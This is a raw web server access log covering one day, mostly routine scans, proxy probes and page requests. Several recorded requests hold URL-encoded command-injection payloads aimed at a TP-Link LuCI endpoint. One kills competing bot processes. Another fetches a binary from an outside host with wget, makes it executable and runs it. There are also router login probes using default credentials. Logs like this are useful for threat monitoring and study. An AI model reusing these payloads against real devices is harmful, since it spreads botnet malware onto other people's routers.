87.121.69.27 - - [26/Jun/2024:00:05:22 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804
45.128.232.200 - - [26/Jun/2024:00:13:50 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748
141.98.11.15 - - [26/Jun/2024:00:22:00 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804
149.50.103.48 - - [26/Jun/2024:00:37:33 +0200] "GET / HTTP/1.1" 200 1895
80.82.78.39 - - [26/Jun/2024:00:40:15 +0200] "GET / HTTP/1.1" 200 1895
80.82.78.39 - - [26/Jun/2024:00:40:17 +0200] "-" 400 1930
162.62.124.140 - - [26/Jun/2024:00:55:40 +0200] "GET / HTTP/1.1" 200 1895
31.43.185.3 - - [26/Jun/2024:01:07:44 +0200] "-" 400 1930
31.43.185.3 - - [26/Jun/2024:01:07:44 +0200] "-" 400 1930
31.43.185.3 - - [26/Jun/2024:01:07:44 +0200] "-" 400 1930
31.43.185.6 - - [26/Jun/2024:01:36:49 +0200] "-" 400 1930
87.121.69.27 - - [26/Jun/2024:02:00:32 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804
94.156.66.81 - - [26/Jun/2024:02:02:52 +0200] "CONNECT 193.149.189.126:7227 HTTP/1.1" 400 804
172.212.60.176 - - [26/Jun/2024:02:14:22 +0200] "-" 400 1930
149.50.103.48 - - [26/Jun/2024:02:46:38 +0200] "GET / HTTP/1.1" 200 1895
115.50.216.157 - - [26/Jun/2024:02:58:56 +0200] "GET /boaform/admin/formLogin?username=user&psd=user HTTP/1.0" 404 749
149.50.103.48 - - [26/Jun/2024:03:21:43 +0200] "GET / HTTP/1.1" 200 1895
194.59.31.99 - - [26/Jun/2024:03:29:54 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804
87.121.69.27 - - [26/Jun/2024:04:20:22 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804
198.235.24.163 - - [26/Jun/2024:04:29:46 +0200] "GET / HTTP/1.1" 200 1895
87.121.69.27 - - [26/Jun/2024:05:20:50 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804
194.59.31.99 - - [26/Jun/2024:05:36:04 +0200] "CONNECT api6.ipify.org:443 HTTP/1.1" 400 804
65.49.1.42 - - [26/Jun/2024:06:07:22 +0200] "-" 400 1930
198.235.24.73 - - [26/Jun/2024:06:18:55 +0200] "GET / HTTP/1.1" 200 1895
149.50.103.48 - - [26/Jun/2024:06:32:29 +0200] "GET / HTTP/1.1" 200 1895
78.80.245.11 - - [26/Jun/2024:06:39:51 +0200] "GET / HTTP/1.0" 200 1895
45.148.10.174 - - [26/Jun/2024:07:08:44 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756
45.148.10.174 - - [26/Jun/2024:07:08:44 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756
141.98.11.15 - - [26/Jun/2024:07:34:35 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804
31.43.185.6 - - [26/Jun/2024:07:36:31 +0200] "-" 400 1930
87.121.69.27 - - [26/Jun/2024:07:37:42 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804
151.242.155.14 - - [26/Jun/2024:07:39:00 +0200] "GET / HTTP/1.1" 200 1895
207.90.244.6 - - [26/Jun/2024:07:57:41 +0200] "GET / HTTP/1.1" 200 1895
207.90.244.6 - - [26/Jun/2024:07:57:42 +0200] "GET /favicon.ico HTTP/1.1" 404 729
149.50.103.48 - - [26/Jun/2024:08:00:04 +0200] "GET / HTTP/1.1" 200 1895
65.49.1.116 - - [26/Jun/2024:08:32:34 +0200] "GET / HTTP/1.1" 200 1895
65.49.1.117 - - [26/Jun/2024:08:32:59 +0200] "GET /favicon.ico HTTP/1.1" 404 729
65.49.1.113 - - [26/Jun/2024:08:33:11 +0200] "GET /?format=json HTTP/1.1" 200 1895
65.49.1.117 - - [26/Jun/2024:08:33:24 +0200] "CONNECT www.shadowserver.org:443 HTTP/1.1" 400 804
143.198.37.176 - - [26/Jun/2024:08:35:50 +0200] "-" 400 1930
143.198.37.176 - - [26/Jun/2024:08:35:50 +0200] "-" 400 1930
143.198.37.176 - - [26/Jun/2024:08:35:50 +0200] "GET / HTTP/1.1" 200 1895
143.198.37.176 - - [26/Jun/2024:08:35:50 +0200] "GET /download/powershell/ HTTP/1.1" 404 746
185.244.36.206 - - [26/Jun/2024:08:42:46 +0200] "GET / HTTP/1.1" 200 1895
149.50.103.48 - - [26/Jun/2024:08:48:48 +0200] "GET / HTTP/1.1" 200 1895
87.121.69.27 - - [26/Jun/2024:09:32:55 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804
151.232.245.135 - - [26/Jun/2024:09:39:48 +0200] "GET / HTTP/1.1" 200 1895
205.210.31.67 - - [26/Jun/2024:10:17:06 +0200] "-" 400 1930
205.210.31.67 - - [26/Jun/2024:10:17:06 +0200] "-" 400 1930
45.148.10.174 - - [26/Jun/2024:11:43:28 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756
45.148.10.174 - - [26/Jun/2024:11:43:28 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756
185.244.36.206 - - [26/Jun/2024:11:48:32 +0200] "GET / HTTP/1.1" 200 1895
45.128.232.200 - - [26/Jun/2024:12:11:30 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748
188.190.221.207 - - [26/Jun/2024:12:21:16 +0200] "GET / HTTP/1.1" 200 1895
206.168.32.98 - - [26/Jun/2024:12:34:34 +0200] "GET / HTTP/1.1" 200 1895
206.168.32.98 - - [26/Jun/2024:12:34:37 +0200] "GET / HTTP/1.1" 200 1895
206.168.32.98 - - [26/Jun/2024:12:34:37 +0200] "GET /favicon.ico HTTP/1.1" 404 729
155.133.23.58 - - [26/Jun/2024:12:47:15 +0200] "GET / HTTP/1.0" 200 1895
45.128.232.200 - - [26/Jun/2024:12:57:56 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748
87.121.69.27 - - [26/Jun/2024:13:05:50 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804
31.43.185.6 - - [26/Jun/2024:13:42:00 +0200] "-" 400 1930
141.98.11.15 - - [26/Jun/2024:13:46:57 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804
87.121.69.27 - - [26/Jun/2024:13:51:02 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804
185.244.36.206 - - [26/Jun/2024:14:54:55 +0200] "GET / HTTP/1.1" 200 1895
206.217.128.98 - - [26/Jun/2024:15:04:52 +0200] "GET / HTTP/1.1" 200 1895
176.123.1.244 - - [26/Jun/2024:15:08:01 +0200] "GET / HTTP/1.1" 200 1895
94.156.8.70 - - [26/Jun/2024:15:10:16 +0200] "CONNECT 193.149.189.126:7227 HTTP/1.1" 400 804
185.191.126.213 - - [26/Jun/2024:15:20:20 +0200] "GET / HTTP/1.1" 200 1895
87.121.69.27 - - [26/Jun/2024:15:49:50 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804
141.98.83.197 - - [26/Jun/2024:15:52:25 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756
141.98.83.197 - - [26/Jun/2024:15:52:25 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756
45.128.232.200 - - [26/Jun/2024:17:10:07 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748
80.76.49.133 - - [26/Jun/2024:17:13:08 +0200] "CONNECT 45.61.136.175:7227 HTTP/1.1" 400 804
43.247.162.29 - - [26/Jun/2024:17:13:52 +0200] "GET / HTTP/1.1" 200 1895
4.151.38.115 - - [26/Jun/2024:17:37:41 +0200] "GET / HTTP/1.1" 200 1895
185.244.36.206 - - [26/Jun/2024:18:03:09 +0200] "GET / HTTP/1.1" 200 1895
185.224.128.17 - - [26/Jun/2024:18:12:45 +0200] "CONNECT example.com:80 HTTP/1.1" 400 804
185.224.128.17 - - [26/Jun/2024:18:12:45 +0200] "-" 400 1930
185.224.128.17 - - [26/Jun/2024:18:12:45 +0200] "-" 400 1930
45.148.10.174 - - [26/Jun/2024:18:14:05 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756
45.148.10.174 - - [26/Jun/2024:18:14:05 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756
179.60.147.131 - - [26/Jun/2024:18:58:12 +0200] "-" 400 1930
141.98.83.197 - - [26/Jun/2024:19:10:36 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756
141.98.83.197 - - [26/Jun/2024:19:10:36 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756
94.156.66.92 - - [26/Jun/2024:19:38:16 +0200] "CONNECT 45.61.136.175:7227 HTTP/1.1" 400 804
31.43.185.6 - - [26/Jun/2024:19:47:15 +0200] "-" 400 1930
141.98.11.15 - - [26/Jun/2024:19:49:23 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804
87.121.69.27 - - [26/Jun/2024:19:53:33 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804
185.17.133.226 - - [26/Jun/2024:20:08:42 +0200] "GET / HTTP/1.1" 200 1895
80.82.78.39 - - [26/Jun/2024:20:12:06 +0200] "GET / HTTP/1.1" 400 771
80.82.78.39 - - [26/Jun/2024:20:12:09 +0200] "-" 400 1930
104.168.70.165 - - [26/Jun/2024:20:35:27 +0200] "GET / HTTP/1.1" 200 1895
205.210.31.81 - - [26/Jun/2024:20:43:54 +0200] "GET / HTTP/1.1" 200 1895
206.168.32.107 - - [26/Jun/2024:21:04:33 +0200] "GET / HTTP/1.1" 200 1895
206.168.32.107 - - [26/Jun/2024:21:04:36 +0200] "GET / HTTP/1.1" 200 1895
206.168.32.107 - - [26/Jun/2024:21:04:36 +0200] "GET /favicon.ico HTTP/1.1" 404 729
87.121.69.27 - - [26/Jun/2024:21:15:36 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804
66.249.66.162 - - [26/Jun/2024:21:49:01 +0200] "GET /robots.txt HTTP/1.1" 404 728
66.249.66.163 - - [26/Jun/2024:21:49:01 +0200] "GET /host-manager/html HTTP/1.1" 401 2044
78.108.177.50 - - [26/Jun/2024:22:45:06 +0200] "GET / HTTP/1.0" 200 1895